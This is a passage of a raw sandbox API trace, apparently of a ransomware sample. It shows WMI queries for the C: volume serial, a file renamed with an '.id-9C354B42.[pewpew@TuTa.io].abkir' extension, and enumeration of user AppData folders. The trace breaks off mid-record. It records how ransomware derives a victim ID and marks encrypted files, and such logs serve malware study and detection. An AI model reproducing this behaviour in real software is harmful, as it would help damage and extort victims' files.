pAptType=0x949e978*=1) returned 0x0 [0181.688] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0181.688] IUnknown:Release (This=0xb51e34) returned 0x1 [0181.689] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x601f390) returned 0x0 [0181.689] WbemLocator:IUnknown:QueryInterface (in: This=0x601f390, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0181.689] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f390, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x6027810) returned 0x0 [0181.689] WbemLocator:IUnknown:Release (This=0x601f390) returned 0x0 [0181.689] WbemLocator:IUnknown:QueryInterface (in: This=0x6027810, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x6027810) returned 0x0 [0181.689] WbemLocator:IUnknown:QueryInterface (in: This=0x6027810, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0181.689] WbemLocator:IUnknown:AddRef (This=0x6027810) returned 0x3 [0181.690] WbemLocator:IUnknown:QueryInterface (in: This=0x6027810, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0181.690] WbemLocator:IUnknown:QueryInterface (in: This=0x6027810, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0181.690] WbemLocator:IUnknown:QueryInterface (in: This=0x6027810, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0181.690] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0181.690] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0181.690] WbemLocator:IUnknown:QueryInterface (in: This=0x6027810, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0181.690] WbemLocator:IUnknown:Release (This=0x6027810) returned 0x2 [0181.690] WbemLocator:IUnknown:Release (This=0x6027810) returned 0x1 [0181.690] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0181.690] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0181.690] WbemLocator:IUnknown:QueryInterface (in: This=0x6027810, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x6027810) returned 0x0 [0181.690] WbemLocator:IUnknown:AddRef (This=0x6027810) returned 0x3 [0181.690] WbemLocator:IUnknown:Release (This=0x6027810) returned 0x2 [0181.690] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60310b0, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0181.690] WbemDefPath:IWbemPath:GetText (in: This=0x60310b0, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0181.690] WbemDefPath:IWbemPath:GetText (in: This=0x60310b0, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0181.690] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x6027820) returned 0x0 [0181.690] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027820, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x603347c) returned 0x0 [0182.442] WbemLocator:IUnknown:QueryInterface (in: This=0x603347c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0xb5b7c4) returned 0x0 [0182.442] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b7c4, pProxy=0x603347c, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0182.442] WbemLocator:IUnknown:Release (This=0xb5b7c4) returned 0x1 [0182.442] WbemLocator:IUnknown:QueryInterface (in: This=0x603347c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0xb5b7e4) returned 0x0 [0182.442] WbemLocator:IUnknown:QueryInterface (in: This=0x603347c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0xb5b7c4) returned 0x0 [0182.442] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b7c4, pProxy=0x603347c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0182.442] WbemLocator:IUnknown:Release (This=0xb5b7c4) returned 0x2 [0182.442] WbemLocator:IUnknown:Release (This=0xb5b7e4) returned 0x1 [0182.442] CoTaskMemFree (pv=0xbd4948) [0182.443] WbemLocator:IUnknown:Release (This=0x6027820) returned 0x0 [0183.155] WbemLocator:IUnknown:QueryInterface (in: This=0x603347c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0xb5b7e4) returned 0x0 [0183.155] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0183.190] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0183.190] WbemLocator:IUnknown:AddRef (This=0xb5b7e4) returned 0x3 [0183.190] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0183.190] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0183.191] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xb5b744) returned 0x0 [0183.191] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b744, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0183.191] WbemLocator:IUnknown:Release (This=0xb5b744) returned 0x3 [0183.191] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0183.191] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0183.191] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0xb5b7cc) returned 0x0 [0183.191] WbemLocator:IRpcOptions:Query (in: This=0xb5b7cc, pPrx=0xb5b7e4, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0183.191] WbemLocator:IUnknown:Release (This=0xb5b7cc) returned 0x3 [0183.191] WbemLocator:IUnknown:Release (This=0xb5b7e4) returned 0x2 [0183.191] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0183.191] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0183.191] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x603347c) returned 0x0 [0183.191] WbemLocator:IUnknown:AddRef (This=0x603347c) returned 0x4 [0183.191] WbemLocator:IUnknown:Release (This=0x603347c) returned 0x3 [0183.191] WbemLocator:IUnknown:Release (This=0x603347c) returned 0x2 [0183.191] SysStringLen (param_1=0x0) returned 0x0 [0183.191] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031040, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0183.191] WbemDefPath:IWbemPath:GetText (in: This=0x6031040, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0183.192] WbemDefPath:IWbemPath:GetText (in: This=0x6031040, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0183.192] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0183.192] WbemLocator:IUnknown:AddRef (This=0xb5b7e4) returned 0x3 [0183.192] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b7e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0xb5b7e4) returned 0x0 [0183.192] WbemLocator:IUnknown:Release (This=0xb5b7e4) returned 0x3 [0183.192] WbemLocator:IUnknown:Release (This=0xb5b7e4) returned 0x2 [0183.192] WbemDefPath:IWbemPath:GetText (in: This=0x6031040, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0183.192] WbemDefPath:IWbemPath:GetText (in: This=0x6031040, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0183.192] IWbemServices:GetObject (in: This=0x603347c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x60287e0, ppCallResult=0x0) returned 0x0 [0184.507] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60310b0, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0184.507] WbemDefPath:IWbemPath:GetText (in: This=0x60310b0, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0184.507] WbemDefPath:IWbemPath:GetText (in: This=0x60310b0, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0184.507] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35eed3c*=0, plFlavor=0x35eed40*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35eed3c*=8, plFlavor=0x35eed40*=0) returned 0x0 [0184.507] SysStringByteLen (bstr="9C354B42") returned 0x10 [0184.507] SysStringByteLen (bstr="9C354B42") returned 0x10 [0184.507] IWbemClassObject:Get (in: This=0x60287e0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35eed3c*=8, plFlavor=0x35eed40*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35eed3c*=8, plFlavor=0x35eed40*=0) returned 0x0 [0184.508] SysStringByteLen (bstr="9C354B42") returned 0x10 [0184.508] SysStringByteLen (bstr="9C354B42") returned 0x10 [0184.508] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpFilePart=0x0) returned 0x9d [0184.508] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xc0 [0184.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0184.508] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x26ac4720, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0184.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0184.508] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0184.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eccc) returned 1 [0184.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment", nBufferLength=0x105, lpBuffer=0x949e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment", lpFilePart=0x0) returned 0x36 [0184.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\", nBufferLength=0x105, lpBuffer=0x949e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\", lpFilePart=0x0) returned 0x37 [0184.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x949e9f4 | out: lpFindFileData=0x949e9f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.511] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.511] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0184.512] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec8c) returned 1 [0184.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec98) returned 1 [0184.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eccc) returned 1 [0184.512] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment", nBufferLength=0x105, lpBuffer=0x949e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment", lpFilePart=0x0) returned 0x36 [0184.512] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\", nBufferLength=0x105, lpBuffer=0x949e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\", lpFilePart=0x0) returned 0x37 [0184.512] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x949e9f4 | out: lpFindFileData=0x949e9f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.513] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.513] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0184.513] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec8c) returned 1 [0184.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec98) returned 1 [0184.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eccc) returned 1 [0184.513] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google", nBufferLength=0x105, lpBuffer=0x949e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google", lpFilePart=0x0) returned 0x32 [0184.514] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\", nBufferLength=0x105, lpBuffer=0x949e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\", lpFilePart=0x0) returned 0x33 [0184.514] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x949e9f4 | out: lpFindFileData=0x949e9f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.515] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, 